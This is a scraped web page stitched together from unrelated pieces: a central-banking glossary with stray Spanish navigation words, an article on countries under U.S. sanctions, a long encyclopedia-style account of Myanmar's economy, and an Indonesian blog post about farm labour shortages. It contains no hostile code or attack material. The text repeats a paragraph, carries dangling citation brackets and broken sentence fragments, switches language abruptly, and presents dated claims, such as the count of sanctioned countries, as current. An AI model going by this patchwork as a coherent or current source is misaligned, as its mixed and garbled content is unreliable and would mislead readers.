Open Market Operations Open market operations (OMO) are when the central bank conducts transactions in the bond market. Typically the central bank will buy or sell government bonds or bills, as they are often the most liquid instrument and have the highest credit quality, and as such most financial institutions will have a portfolio of such securities. The purpose of open market operations is increase or decrease the monetary base, for example when the bank buys a bond it is purchasing an asset in exchange for cash; this is said to be an injection of cash into the system; similarly when the bank sells securities it transfers the assets to the buyer which pays the bank with cash, thereby removing cash from the system. The basic premise of these operations is that the size of the monetary base is linked to inflation (i. e. more cash in the system should lead to higher prices, holding all else constant). parte superior

Money Supply The money supply (also known as money stock) refers to the total amount of money available in an economy at a given point. Money supply is often talked about in terms of its particular measures: M0 = Notes and coins in circulation and in bank vaults MB = M0 plus minimum reserves and excess reserves of banks (referred to as the monetary base) M1 = Notes and coins in circulation, traveler's checks, demand deposits and other checkable deposits M2 = Money and close substitutes for money, a broader classification of money, this includes M1 plus savings deposits and time deposits; M2 is a key economic indicator because of its historical link with inflation M3 = M2 plus large time deposits, institutional money market funds, short-term repos and other larger liquid assets MZM = Money with zero maturity, it encompasses financial assets redeemable at par on demand The money supply is an important facet of central banking and monetary policy, as monetary policy can be implemented through targeting money supply levels, or by targeting an interest rate level (which may be reached by influencing the money supply). The growth in the supply of money is understood to move with and influence the level of inflation and economic growth. parte superior

Repurchase Agreement (Repo) A repurchase agreement (repo) is a transaction involving the sale of an asset (e. g. a bond) with the subsequent repurchase of that same asset for a slightly higher price. Repurchase operations are usually undertaken as a means of borrowing money; using the bond as collateral, as such the price differential is effectively the borrowing interest rate. Central banks frequently engage in repurchase (asset seller = borrower) and reverse repurchase (asset buyer = lender) transactions as part of their Open Market Operations; as a means of injecting or withdrawing liquidity from the system. Central banks often adjust their official/target repo and reverse repo rates as a means of influencing the costs/benefits of borrowing/lending by financial market participants and institutions. parte superior

Discount Window The discount window refers to a mechanism whereby eligible institutions (financial institutions, commercial banks) borrow money from the central bank, typically on a short term basis (and typically via repurchase and reverse repurchase agreements); and usually as a means of meeting temporary shortages of liquidity. The interest rate charged on such loans is called the discount rate (also referred to as the base rate or repo rate). The discount window is a key tool in promoting financial market and banking system stability, particularly when money markets tighten, as in times of crisis e. g. the US Federal Reserve discount window saw considerable use during the 2008-9 financial crisis. The term discount window originated from when bank representatives physically visited the reserve bank when the bank needed to borrow money. In the eurozone, the European Central Bank (ECB) operates an equivalent mechanism called Standing Facilities; with the Marginal Lending Facility available for short-term bank funding, and the Deposit facility as a means for depositing excess funds. parte superior

The following sources are suggested by Central Bank News as further reading and reference for central banking and monetary policy studies.

Also check out the websites of various central banks (see: central bank directory ); most have good material on their websites with specific notes on how they operate.

Countries Sanctioned By The U. S. - And Why

It's not a good idea to get on the United States' bad side. As the wealthiest country in the world, the U. S. also lays claim to the world's most powerful military. But military might is nothing compared to the repercussions that economic sanctions from the U. S. can bring about. In Pictures: 9 Tricks Of The Successful Forex Trader

Economic sanctions are a popular way for large governments to exert their disapproval over one another. While wars are costly – both economically and politically – economic sanctions tend to be somewhat less tangible, at least for the country doing the sanctioning. But for the country being sanctioned, the results can be enormous and long lasting. (This instrument of foreign policy and economic pressure is preferred over military action but can still pack a punch. Find out more in The Power Of Economic Sanctions .)

What does a country need to do to attract the ire of the United States? Overwhelmingly, the U. S. sanctions countries that sponsor terrorism or perpetrate human rights violations on their people. Right now, six countries are being sanctioned.

Burma The Southeast Asian nation of Burma – also known as the Union of Myanmar – is one of the countries that the U. S. has placed sanctions on for human rights and political reasons. The country is ruled by a military junta, a committee of military leaders that makes political decisions for the country of 50 million. In charge is Senior General Than Shwe, the head of state who made the number-four spot in Parade Magazine's 2009 list of World's Worst Dictators .

U. S. sanctions prohibit investment into Burma, restrict the financial resources of the ruling military junta and disallow U. S. imports of Burmese products, as well as U. S. exports of financial services to the country. However, General License No. 14-B allows not-for-profit humanitarian and religious organizations in Burma to receive U. S. funding.

Côte d'Ivoire The West African nation Côte d'Ivoire (or the Ivory Coast, in English) is another country that's being sanctioned by the U. S. government for human rights violations. In the 1970s, Côte d'Ivoire was home to Africa's strongest economies thanks to booming coffee and cocoa exports, but an economic decline through the 1980s and 1990s brought about social problems that eventually lead to civil war in 1999. The country is still in conflict, with both sides of the fight charged with numerous human rights violations.

As a result, U. S. sanctions prohibit trade with people or organizations who provide arms or assistance to Côte d'Ivoire. (Learn the contract specifications for a few of the most heavily traded commodities, in The Sweet Life Of Soft Markets .)

Cuba One of the U. S.'s longest-standing and most well known sanctions is against one of our neighbors to the south: Cuba. In February, 1959, Fidel Castro became Prime Minister of Cuba, unseating a post-revolution Cuban government that was favored by the United States (ironically, the previous Batista regime was defeated in part because of a U. S. imposed arms embargo ). Since the Cuban dictator took power, the U. S. has had trade embargoes in place as a punishment for impediments to democratic rule.

While Americans aren't generally allowed to trade or travel with Cuban interests, the close geographic proximity (and large Cuban-American population) have ensured that a number of exemptions exist for humanitarian work and visiting relatives. (The tax-free zones in Taking A Look At Tax Havens might sound appealing, but the consequences often aren't.)

Iran Following the Iranian Revolution, where the Western-friendly Shah of Iran was deposed in favor of a theocratic government, the Iranian Hostage Crisis and other ensuing events pushed the U. S. to levy a trade embargo on the Middle Eastern nation.

With increasingly tenuous political relations right now, Iranian economic sanctions continue to be a hotly discussed topic.

North Korea North Korea is arguably the country most brutally affected by U. S. economic sanctions. North Korea's battles with the U. S. started in the 1950s with the United States' entry into the Korean War – a move designed to counter the USSR's support for a unified, communist Korea. Today, North and South Korea continue to technically be at war (albeit under a ceasefire since 1953), and the U. S. maintains stringent trade restriction on the country. (Blitzkrieg? Dawn raids? Sounds like the markets and the battlefield have a few things in common! Find out more in War's Influence On Wall Street .)

Syria As one of the nations that former U. N. Ambassador John Bolton named as "beyond the axis of evil," Syria has had contentious relations with the United States because of its position as a sponsor of terrorism. As a result, the U. S. has strong trade restrictions on the country, barring major exports as well as financial services for individuals or organizations linked to terror. (The measures in Standard Of Living Vs. Quality Of Life may seem similar, but the reality is an issue of qualitative versus quantitative.)

Other Economic Sanctions Not all of the U. S.'s economic sanctions are against entire countries. Instead, the U. S. Treasury keeps a list of specific people and organizations in the Balkans, Belarus, Congo, Iraq, Liberia, Sudan and Zimbabwe who U. S. nationals and organizations are forbidden from doing business with. Generally, those sanctions focus on political groups or organizations that promote violence or social unrest, instead of the country's official government.

Military action isn't the only option for countries that are in the midst of a political dispute. Instead, economic sanctions provide an immediate way for the U. S. to crack down on rogue countries without putting lives on the line.

(Catch up on this week's top financial news in Water Cooler Finance: Auto Hope, Bubbling Oil And Obamanomics .)

Economy of Myanmar



Classical era

Historically, Burma was the main trade route between India and China since 100 BC. The Mon Kingdom of lower Burma served as important trading centre in the Bay of Bengal .

According to Michael Adas, Ian Brown, and other economic historians of Burma, Burma's pre-colonial economy in Burma was essentially a subsistence economy. with the majority of the population involved in rice production and other forms of agriculture. [ 6 ] Burma also lacked a formal monetary system until the reign of King Mindon Min in the middle 19th century. [ 6 ]

All land was technically owned by the Burmese monarch. [ 7 ] Exports, along with oil wells, gem mining and teak production were controlled by the monarch. [ 7 ] Burma was vitally involved in the Indian Ocean trade. [ 6 ] Logged teak was a prized export that was used in European shipbuilding, because of its durability, and became the focal point of the Burmese export trade from the 1700s to the 1800s. [ 8 ]

British Burma (1885 - 1948)

After Burma was conquered by the British, it became the wealthiest country in Southeast Asia, after the Philippines. It was also once the world's largest exporter of rice. During British administration. Burma supplied oil through the Burmah Oil Company. Burma also had a wealth of natural and labour resources. It produced 75% of the world's teak and had a highly literate population. [ 7 ] The country was believed to be on the fast track to development. [ 7 ]

Post-independence (1948-)

After a parliamentary government was formed in 1948, Prime Minister U Nu embarked upon a policy of nationalisation. He attempted to make Burma a welfare state by adopting central planning measures. The government also tried to implement a poorly thought out Eight-Year plan. By the 1950s, rice exports had fallen by two thirds and mineral exports by over 96%. Plans were partly financed by printing money, which led to inflation. [ 9 ] The 1962 coup d'état was followed by an economic scheme called the Burmese Way to Socialism. a plan to nationalise all industries. The catastrophic program turned Burma into one of the world's most impoverished countries. [ 10 ]

The 1962 coup d'état was followed by an economic scheme called the Burmese Way to Socialism. a plan to nationalise all industries, with the exception of agriculture. The catastrophic program turned Burma into one of the world's most impoverished countries. [ 10 ] [ 11 ] Burma's admittance to least developed country status by the United Nations in 1987 highlighted its economic bankruptcy. [ 12 ]

Military rule (1988 - 2011)

After 1988, the regime retreated from totalitarian socialism. It permitted modest expansion of the private sector, allowed some foreign investment, and received much needed foreign exchange. [ 13 ] The economy is rated in 2009 as the least free in Asia (tied with North Korea ). [ 14 ] All fundamental market institutions are suppressed. [ 14 ] [ 15 ] Private enterprises are often co-owned or indirectly owned by state. The corruption watchdog organisation Transparency International in its 2007 Corruption Perceptions Index released on 26 September 2007 ranked Burma the most corrupt country in the world, tied with Somalia. [ 16 ]

The national currency is the kyat. Burma currently has a dual exchange rate system similar to Cuba. [ 17 ] The market rate was around two hundred times below the government-set rate in 2006. [ 15 ] In 2011, the Burmese government enlisted the aid of International Monetary Fund to evaluate options to reform the current exchange rate system, to stabilise the domestic foreign exchange trading market and creates economic distortions. [ 18 ] The dual exchange rate system allows for the government and state-owned enterprises to divert funds and revenues, but also gives the government more control over the local economy and temporarily subdue inflation. [ 19 ] [ 20 ]

Inflation averaged 30.1% between 2005 and 2007. [ 14 ] Inflation is a serious problem for the economy. In April 2007, the National League for Democracy organised a two-day workshop on the economy. The workshop concluded that skyrocketing inflation was impeding economic growth. "Basic commodity prices have increased from 30% to 60% since the military regime promoted a salary increase for government workers in April 2006," said Soe Win, the moderator of the workshop. "Inflation is also correlated with corruption." Myint Thein, an NLD spokesperson, added: "Inflation is the critical source of the current economic crisis." [ 21 ]

In recent years, both China and India have attempted to strengthen ties with the government for economic benefit. Many nations, including the United States and Canada, and the European Union, have imposed investment and trade sanctions on Burma. The United States banned all imports from Burma, though this restriction was since lifted. [ 15 ] Foreign investment comes primarily from People's Republic of China. Singapur. South Korea. India. and Thailand. [ 22 ]

Economic liberalisation (2011-present)

In 2011, when new President Thein Sein 's government came to power, Burma embarked on a major policy of reforms including anti-corruption. currency exchange rate. foreign investment laws and taxation. Foreign investments increased from US$300 million in 2009-10 to a US$20 billion in 2010-11 by about 66.7%. [ 23 ] Large inflow of capital results in stronger Burmese currency, kyat by about 25%. In response, the government relaxed import restrictions and abolished export taxes. Despite current currency problems, Burmese economy is expected to grow by about 8.8% in 2011. [ 24 ] After the completion of 58-billion dollar Dawei deep seaport, Burma is expected be at the hub of trade connecting Southeast Asia and the South China Sea, via the Andaman Sea, to the Indian Ocean receiving goods from countries in the Middle East, Europe and Africa, and spurring growth in the ASEAN region. [ 25 ] [ 26 ]

In 2012, the Asian Development Bank formally began re-engaging with the country, to finance infrastructure and development projects in the country. [ 27 ] The $512 million loan is the first issued by the ADB to Myanmar in 30 years and will target banking services, ultimately leading to other major investments in road, energy, irrigation and education projects. [ 28 ]

In March 2012, a draft foreign investment law emerged, the first in more than 2 decades. This law oversees unprecedented liberalisation of the economy. It for example stipulates that foreigners no longer require a local partner to start a business in the country, and are able to legally lease land. [ 29 ] The draft law also stipulates that Burmese citizens must constitute at least 25% of the firm's skilled workforce, and with subsequent training, up to 50-75%. [ 29 ]

On 28 January 2013 the government of Myanmar announced deals with international lenders to cancel or refinance nearly $6 billion of its debt, almost 60 per cent of what it owes to foreign lenders. Japan wrote off US$3 Billion, nations in the group of Paris Club wrote off US$2.2 Billion and Norway wrote off US$534 Million. [ 30 ]

Myanmar's inward foreign direct investment has steadily increased since its reform. The country approved US$4.4 billion worth of investment projects between January and November 2014. [ 31 ]

According to one report released on 30 May 2013 by the McKinsey Global Institute, Burma's future looks bright, with its economy expected to quadruple by 2030 if it invests in more high-tech industries. [ 32 ] This however does assume that other factors (such as drug trade, the continuing war of the government with specific ethnic groups. ) does not interfere.

Still unresolved internal problems

In a first ever countrywide study the Myanmar government found that 37 per cent of the nation’s population are unemployed and an average of 26 per cent live in poverty. [ 33 ]

The current state of the Burmese economy has also had a significant impact on the demographics of Burma. as economic hardship results in extreme delays of marriage and family building. The average age of marriage in Burma is 27.5 for men, 26.4 for women, almost unparalleled in the region, with the exception of developed countries like Singapore. [ 34 ] [ 35 ]

Burma also has a low fertility rate, of 2.07 children per woman (2010), especially as compared to other Southeast Asian countries of similar economic standing, like Cambodia (3.18) and Laos (4.41), representing a significant decline from 4.7 in 1983, despite the absence of a national population policy. [ 36 ] This is at least partly attributed to the economic strain that additional children place on the family income, and has resulted in the prevalence of illegal abortions in the country, as well as use of other forms of birth control. [ 37 ]

The 2012 foreign investment law draft included a proposal to transform the Myanmar Investment Commission from a government-appointed body into an independent board. This could bring greater transparency to the process of issuing investment licenses, according to the proposed reforms drafted by experts and senior officials. [ 38 ] However, even with this draft, it will still remain a question on whether corruption in the government can be addressed (links have been shown between certain key individuals inside the government and the drug trade, as well as many industries that use forced labour - for example the mining industry-. [ 39 ]

Many regions (such as the Golden Triangle) remain off-limits for foreigners, and in some of these regions, the government is still at war with certain ethnic groups. [ 39 ] [ 40 ]


The major agricultural produce is rice which covers about 60% of the country's total cultivated land area. Rice accounts for 97% of total food grain production by weight. Through collaboration with the International Rice Research Institute (IRRI ), 52 modern rice varieties were released in the country between 1966 and 1997, helping increase national rice production to 14 million tons in 1987 and to 19 million tons in 1996. By 1988, modern varieties were planted on half of the country's rice fields, including 98% of the irrigated areas. [ 41 ] In 2011, Myanmar's total milled rice production accounted for 10.26 million tons, an increase from the 1.8 per cent back in 2010. [ 42 ]

In northern Burma opium. bans have ended a century old tradition of growing poppy. Between 20,000 and 30,000 ex-poppyfarmers left the Kokang region as a result of the ban in 2002. [ 43 ] People from the Wa region, where the ban was implemented in 2005, fled to areas where growing opium is still possible. Other ex-poppyfarmers are being relocated to areas near rubber plantations. These are often mono-plantations from Chinese investors. [ citation needed ]

Rubber plantations are being promoted in areas of high elevation like Mong Mao. Sugar plantations are grown in the lowlands such as Mong Pawk District. [ 43 ]

The lack of an educated workforce skilled in modern technology contributes to the growing problems of the economy. [ 44 ]

Today, the country lacks adequate infrastructure. Goods travel primarily across the Thai border (where most illegal drugs are exported) and along the Ayeyarwady River. Railroads are old and rudimentary, with few repairs since their construction in the late nineteenth century. [ 45 ] Highways are normally unpaved, except in the major cities. [ 45 ] Energy shortages are common throughout the country including in Yangon. More than 45 million of the country's population is without electricity, with 70 per cent of people living in rural areas. [ 46 ]

Burma is also the world's second largest producer of opium. accounting for 8% of entire world production and is a major source of illegal drugs. including amphetamines. [ 47 ] Other industries include agricultural goods, textiles, wood products, construction materials, gems, metals, oil and natural gas.

The private sector dominates in agriculture. light industry. and transport activities, while the military government controls energy. heavy industry. and rice trade.

Garment production

In March 2012, 6 of Thailand's largest garment manufacturers announced that they would move production to Burma, principally to the Yangon area, citing lower labour costs. [ 48 ] The Myanmar Govt. has introduced minimum wage of MMR 3,600 (US$2.80) per day for the garment workers from 1 September 2015. [ 49 ]

Illegal drug trade

A world map of the world's primary opium or heroin producers. The Golden Triangle region, which Burma is part of, is pinpointed in this map.

Burma (Myanmar) is the largest producer of methamphetamines in the world, with the majority of ya ba found in Thailand produced in Burma, particularly in the Golden Triangle and Northeastern Shan State. which borders Thailand, Laos and China. [ 50 ] Burmese-produced Ya ba is typically trafficked to Thailand via Laos. before being transported through the northeastern Thai region of Isan. [ 51 ]

In 2010, Burma trafficked 1 billion tablets to neighbouring Thailand. [ 50 ] In 2009, Chinese authorities seized over 40 million tablets that had been illegally trafficked from Burma. [ 52 ] Ethnic militias and rebel groups (in particular the United Wa State Army ) are responsible for much of this production; however, the Burmese military units are believed to be heavily involved in the trafficking of the drugs. [ 50 ]

Burma is also the 2nd largest supplier of opium (following Afghanistan ) in the world, with 95% of opium grown in Shan State. [ 53 ] [ 54 ] Illegal narcotics have generated $1 to $2 billion USD in exports annually, with estimates of 40% of the country's foreign exchange coming from drugs. [ 50 ] [ 55 ] Efforts to eradicate opium cultivation have pushed many ethnic rebel groups, including the United Wa State Army and the Kokang to diversify into methamphetamine production.

Prior to the 1980s, heroin was typically transported from Burma to Thailand, before being trafficked by sea to Hong Kong. which was and still remains the major transit point at which heroin enters the international market. Now, drug trafficking has circumvented to southern China (from Yunnan. Guizhou. Guangxi. Guangdong ) because of a growing market for drugs in China, before reaching Hong Kong. [ 56 ]

The prominence of major drug traffickers have allowed them to penetrate other sectors of the Burmese economy, including the banking, airline, hotel and infrastructure industries. [ 57 ] Their investment in infrastructure have allowed them to make more profits, facilitate drug trafficking and money laundering. [ 58 ]

Oil and gas

A private petrol station in the Inle lake region, Myanmar.

Myanma Oil and Gas Enterprise (MOGE) is a national oil and gas company of Burma. The company is a sole operator of oil and gas exploration and production, as well as domestic gas transmission through a 1,900-kilometre (1,200 mi) onshore pipeline grid. [ 59 ] [ 60 ]

The Yadana Project is a project to exploit the Yadana gas field in the Andaman Sea and to carry natural gas to Thailand through Myanmar .

Sino-Burma pipelines refers to planned oil and natural gas pipelines linking the Burma 's deep-water port of Kyaukphyu (Sittwe ) in the Bay of Bengal with Kunming in Yunnan province. China .

The Norwegian company Seadrill owned by John Fredriksen is involved in offshore oildrilling, expected to give the Burmese Military Junta oil and oil export revenues.

Myanmar exported $3.5 billion worth of gas, mostly to Thailand in the fiscal year up to March 2012. [ 61 ]

Initiation to bid on oil exploration licenses for 18 of Myanmar’s onshore oil blocks has been released on 18 January 2013. [ 61 ]


The Union of Myanmar's rulers depend on sales of precious stones such as sapphires. pearls and jade to fund their regime. Rubies are the biggest earner; 90% of the world's rubies come from the country, whose red stones are prized for their purity and hue. Thailand buys the majority of the country's gems. Burma's " Valley of Rubies ", the mountainous Mogok area, 200 km (120 mi) north of Mandalay. is noted for its rare pigeon's blood rubies and blue sapphires. [ 62 ]

In 2007, following the crackdown on pro-democracy protests in Myanmar. human rights organisations, gem dealers, and US First Lady Laura Bush called for a boycott of a Myanmar gem auction held twice yearly, arguing that the sale of the stones profits the dictatorial regime in that country. [ 63 ] Debbie Stothard of the Alternative ASEAN Network on Burma stated that mining operators used drugs on employees to improve productivity, with needles shared, raising the risk of HIV infection: "These rubies are red with the blood of young people." Brian Leber (41-year-old jeweller who founded The Jewellers' Burma Relief Project) stated that: "For the time being, Burmese gems should not be something to be proud of. They should be an object of revulsion. It's the only country where one obtains really top quality rubies, but I stopped dealing in them. I don't want to be part of a nation's misery. If someone asks for a ruby now I show them a nice pink sapphire." [ 64 ]

Richard W. Hughes, author of Ruby and Sapphire, a Bangkok-based gemologist who has made many trips to Burma makes the point that for every ruby sold through the junta, another gem that supports subsistence mining is smuggled over the Thai border. [ 65 ] Burma's gemstone industry is a cornerstone of the Burmese economy with exports topping $1 billion. [ 66 ]

The permits for new gem mines in Mogoke, Mineshu and Nanyar state will be issued by the ministry according to a statement issued by the ministry on 11 February. While many sanctions placed on the former regime were eased or lifted in 2012, the US has left restrictions on importing rubies and jade from Myanmar intact. According to recent amendments to the new Myanmar foreign investment law, there is no longer a minimum capital requirement for investments, except in mining ventures, which require substantial proof of capital and must be documented through a domestic bank. Another important clarification in the investment law is the dropping of foreign ownership restrictions in joint ventures, except in restricted sectors, such as mining, where FDI will be capped at 80 per cent. [ 67 ]


Since 1992, the government has encouraged tourism. Until 2008, fewer than 750,000 tourists entered the country annually, [ 68 ] but there has been substantial growth over the past years. In 2012, 1.06 million tourists visited the country, [ 69 ] and 1.8 million are expected to visit by the end of 2013.

Tourism is thus a growing sector of the economy of Burma. Burma has diverse and varied tourist attractions and is served internationally by numerous airlines via direct flights. Domestic and foreign airlines also operate flights within the country. Cruise ships also dock at Yangon. Overland entry with a border pass is permitted at several border checkpoints. The government requires a valid passport with an entry visa for all tourists and business people. As of May 2010, foreign business visitors from any country can apply for a visa on arrival when passing through Yangon and Mandalay international airports without having to make any prior arrangements with travel agencies. [ 70 ] Both the tourist visa and business visa are valid for 28 days, renewable for an additional 14 days for tourism and 3 months for business. Seeing Burma through a personal tour guide is popular. Travelers can hire guides through travel agencies.

[ 71 ] Aung San Suu Kyi has requested that international tourists not visit Burma. The junta's forced labour programmes were focused around tourist destinations which have been heavily criticised for their human rights records. Even disregarding the obviously governmental fees, Burma’s Minister of Hotels and Tourism Major-General Saw Lwin recently admitted that the government receives a significant percentage of the income of private sector tourism services. Not to mention the fact that only a very small minority of impoverished ordinary people in Burma ever see any money with any relation to tourism. [ 72 ]

Much of the country is completely off-limits to tourists, and the military very tightly controls interactions between foreigners and the people of Burma. They are not to discuss politics with foreigners, under penalty of imprisonment, and in 2001, the Myanmar Tourism Promotion Board issued an order for local officials to protect tourists and limit "unnecessary contact" between foreigners and ordinary Burmese people. [ 73 ]

External trade

Burmese exports in 2006

Foreign investment

Though foreign investment has been encouraged, it has so far met with only moderate success. This is because foreign investors have been adversely affected by the junta government policies and because of international pressure to boycott the junta government. [ citation needed ] The United States has placed trade sanctions on Burma. The European Union has placed embargoes on arms, non-humanitarian aid, visa bans on military regime leaders, and limited investment bans. Both the European Union and the US have placed sanctions on grounds of human rights violations in the country. Many nations in Asia. particularly India. Thailand and China have actively traded with Burma. However, on 22 April the EU suspended economic and political sanctions against Burma. [ 75 ]

The public sector enterprises remain highly inefficient and also privatisation efforts have stalled. [ citation needed ] The estimates of Burmese foreign trade are highly ambiguous because of the great volume of black market trading. A major ongoing problem is the failure to achieve monetary and fiscal stability. Due to this, Burma remains a poor country with no improvement of living standards for the majority of the population over the past decade. The main causes for continued sluggish growth are poor government planning, internal unrest, minimal foreign investment and the large trade deficit. One of the recent government initiatives is to utilise Burma's large natural gas deposits. Currently, Burma has attracted investment from Thai, Malaysian, Filipino, Russian, Australian, Indian, and Singaporean companies. [ 76 ] Trade with the US amounted to $243.56 million as of February 2013, accounting for 15 projects and just 0.58 per cent of the total, according to government statistics. [ 77 ]

The Economist special report on Burma points to increased economic activity resulting from Burma's political transformation and influx of foreign direct investment from Asian neighbours. [ 78 ] Near the Mingaladon Industrial Park, for example, Japanese-owned factories have risen from the "debris" caused by "decades of sanctions and economic mismanagement." [ 78 ] Japanese Prime Minister Shinzo Abe has identified Burma as economically attractive market that will help stimulate the Japanese economy. [ 78 ] Among its various enterprises, Japan is helping build the Thilawa Port. which is part of the Thilawa Special Economic Zone. and helping fix the electricity supply in Yangon. [ 78 ]

Japan isn’t the largest investor in Myanmar. "Thailand, for instance, the second biggest investor in Myanmar after China, is forging ahead with a bigger version of Thilawa at Dawei. on Myanmar’s Tenasserim Coast. Thai rulers have for centuries been toying with the idea of building a canal across the Kra Isthmus. linking the Gulf of Thailand directly to the Andaman Sea and the Indian Ocean to avoid the journey round peninsular Malaysia through the Strait of Malacca ." [ 78 ]

Dawei would give Thailand that connection. China, by far the biggest investor in Burma, has focused on constructing oil and gas pipelines that "crisscross the country, starting from a new terminus at Kyaukphyu. just below Sittwe. up to Mandalay and on to the Chinese border town of Ruili and then Kunming. the capital of Yunnan province ." [ 78 ] This would prevent China from "having to funnel oil from Africa and the Middle East through the bottleneck around Singapore." [ 78 ]

According to the CIA World Factbook, [ 79 ]

Burma, a resource-rich country, suffers from pervasive government controls, inefficient economic policies, and rural poverty. The junta took steps in the early 1990s to liberalize the economy after decades of failure under the "Burmese Way to Socialism," but those efforts stalled, and some of the liberalization measures were rescinded. Burma does not have monetary or fiscal stability, so the economy suffers from serious macroeconomic imbalances - including inflation, multiple official exchange rates that overvalue the Burmese kyat, and a distorted interest rate regime. Most overseas development assistance ceased after the junta began to suppress the democracy movement in 1988 and subsequently refused to honor the results of the 1990 legislative elections. In response to the government of Burma's attack in May 2003 on Aung San Suu Kyi and her convoy, the US imposed new economic sanctions against Burma - including a ban on imports of Burmese products and a ban on provision of financial services by US persons. A poor investment climate further slowed the inflow of foreign exchange. The most productive sectors will continue to be in extractive industries, especially oil and gas, mining, and timber. Other areas, such as manufacturing and services, are struggling with inadequate infrastructure, unpredictable import/export policies, deteriorating health and education systems, and corruption. A major banking crisis in 2003 shuttered the country's 20 private banks and disrupted the economy. As of December 2005, the largest private banks operate under tight restrictions limiting the private sector's access to formal credit. Official statistics are inaccurate. Published statistics on foreign trade are greatly understated because of the size of the black market and unofficial border trade - often estimated to be as large as the official economy. Burma's trade with Thailand, China, and India is rising. Though the Burmese government has good economic relations with its neighbors, better investment and business climates and an improved political situation are needed to promote foreign investment, exports, and tourism.

Financing Geothermal projects in Myanmar use an estimated break even power cost of 5.3-8.6 U. S cents/kWh or in Myanmar Kyat 53-86K per kWh. This pegs a non-fluctuating $1=1000K, which is a main concern for power project funding. The main drawback with depreciation pressures, in the current FX market. Between June 2012 and October 2015, the Myanmar Kyat depreciated by approximately 35%, from 850 down to 1300 against the US Dollar. Local businesses with foreign denominated loans from abroad suddenly found themselves rushing for a strategy to mitigate currency risks. Myanmar’s current lack of available currency hedging solutions presents a real challenge for Geothermal project financing. [ 80 ]

Foreign aid

The level of international aid to Burma ranks amongst the lowest in the world (and the lowest in the Southeast Asian region) [ 81 ] — Burma receives the $4 per capita in development assistance, as compared to the average of $42.30 per capita. [ 82 ] [ 83 ]

In April 2007, the US Government Accountability Office (GAO) identified the financial and other restrictions that the military government places on international humanitarian assistance in the Southeast Asian country. The GAO report, entitled "Assistance Programs Constrained in Burma," outlines the specific efforts of the Burmese government to hinder the humanitarian work of international organisations, including by restricting the free movement of international staff within the country. The report notes that the regime has tightened its control over assistance work since former Prime Minister Khin Nyunt was purged in October 2004.

Furthermore, the reports states that the military government passed guidelines in February 2006, which formalised Burma's restrictive policies. According to the report, the guidelines require that programs run by humanitarian groups "enhance and safeguard the national interest" and that international organisations co-ordinate with state agents and select their Burmese staff from government-prepared lists of individuals. United Nations officials have declared these restrictions unacceptable.

The shameful behavior of Burma's military regime in tying the hand of humanitarian organizations is laid out in these pages for all to see, and it must come to an end," said U. S. Representative Tom Lantos (D-CA). "In eastern Burma, where the military regime has burned or otherwise destroyed over 3,000 villages, humanitarian relief has been decimated. At least one million people have fled their homes and many are simply being left to die in the jungle."

US Representative Ileana Ros-Lehtinen (R-FL) said that the report "underscores the need for democratic change in Burma, whose military regime arbitrarily arrests, tortures, rapes and executes its own people, ruthlessly persecutes ethnic minorities, and bizarrely builds itself a new capital city while failing to address the increasingly urgent challenges of refugee flows, illicit narcotics and human trafficking, and the spread of HIV/AIDS and other communicable diseases." [ 84 ]

Other statistics

Electricity - production: 5.961 billion kWh (2006 est.)

Electricity - consumption: 4.298 billion kWh (2006 est.)

Electricity - exports: 0 kWh (2007)

Electricity - imports: 0 kWh (2007)

Agriculture - products: rice, pulses, beans, sesame, groundnuts, sugarcane; hardwood; fish and fish products

Currency: 1 kyat (K) = 100 pyas

Exchange rates: kyats per US dollar - 1,205 (2008 est.), 1,296 (2007), 1,280 (2006), 5.82 (2005), 5.7459 (2004), 6.0764 (2003) note: unofficial exchange rates ranged in 2004 from 815 kyat/US dollar to nearly 970 kyat/US dollar, and by year end 2005, the unofficial exchange rate was 1,075 kyat/US dollar; data shown for 2003-05 are official exchange rates

Foreign Direct Investment In the first nine months of 2012-2013, Myanmar has received investment of USD 794 million. China has biggest of investment commitments for this fiscal. [ 85 ]

Foreign Trade Total foreign trade for 2012 was recorded to USD 13.3 billion. It was 27% of Myanmar's GDP. [ 85 ]

External References


Otras lecturas

Sulitnya petani untuk mencari orang untuk menanam, saat sekarang sudah sangat terasa sekali. Kesulitan itu sudah dirasakan petani di pelosok – pelosok desa, walaupun masih banyak orang yang memungkinkan untuk membantunya. Selain sulit untuk mencari tenaga kerja tanam, petai secara otomatis akan dihadapkan oleh mahalnya ongkos (biaya) tenaga kerja tanam. Sebenarnya tidak hanya sulit mencari tenaga kerja untuk tanam saja, tetapi hampir semua proses usahatani mengalami kesulitan mencari tenaga kerja. Mulai pengolahan tanah, pembibitan, tanam hingga panen dan paska panen.

Masyarakat lebih memilih pekerjaan selain buruh tani (kerja di sawah atau kebun). Masyarakat yang berusia muda lebih memilih bekerja di pabrik – pabrik, penjaga toko, pembantu rumah tangga bahkan menjadi TKI, sementara yang mau berjibaku dengan lumpur, keringat, daun – daunan kotor dan seterusnya hanyalah orang yang usianya mendekati separuh abad.

Dari upah memang lebih banyak diterima dari bekerja di sebuah pabrik. Tenaga yang dikeluarkan untuk meraih upah itu juga tidak sebesar ketia bekerja di sawah atau kebun. Berbagai alasan yang secara realita memang dapat diterima oleh akal. Semua bertujuan sama, yaitu untuk memenuhi kebutuhan hidup dan berharap meningkatkan kesejahteraannya.

Orang mau bekerja di sawah atau kebun itu seringkali hanya kondisi yang memaksakan untuk melakoninya. Keterpaksaan yang menjadi alternatif kesekian. Bukan tanpa alasan kondisi seperti itu. Upah yang terlalu kecil (murah), pekerjaan yang lumayan berat dan kotor dan musiman. Berbeda dengan kondisi pada pekerja di sebuah perkebunan besar, seperti perkebunan kelapa sawit. Mereka masih mendapatkan upah yang lebih bagus dibanding buruh perkebuna lain atau buruh tani di sawah. Nah persoalan itu yang sering dihadapi oleh petani. Sehingga petani rela untuk mengeluarkan upah yang lumayan tinggi demi usahataninya berjalan lancar.

Melihat kondisi seperti di atas, kiranya ada peluang yang cukup bagus bagi orang – orang di pelosok desa untuk membentuk suatu regu (pasukan) tanam. Mereka yang tergabung dalam pasukan tanam itu, diberikan suatu pelatihan khusus menanam sesuai dengan teknisnya. Misalnya, dilatih untuk menanam padi dengan sistem jajar legawa atau SRI secara utuh, teknis menanam tanaman perkebunan dengan benar dan seterusnya.

Dengan pembinaan secara intensif dan didukung manajemen serta marketing yang bagus, kiranya “pasukan tanam” ini bisa menjadi salah satu alternatif mengatasi sulitnya tenaga kerja tanam yang dirasakan para petani. Dengan begitu buruh tani mempunyai nilai tawar yang kuat, sehingga mereka dalam menerima upah akan lebih layak.

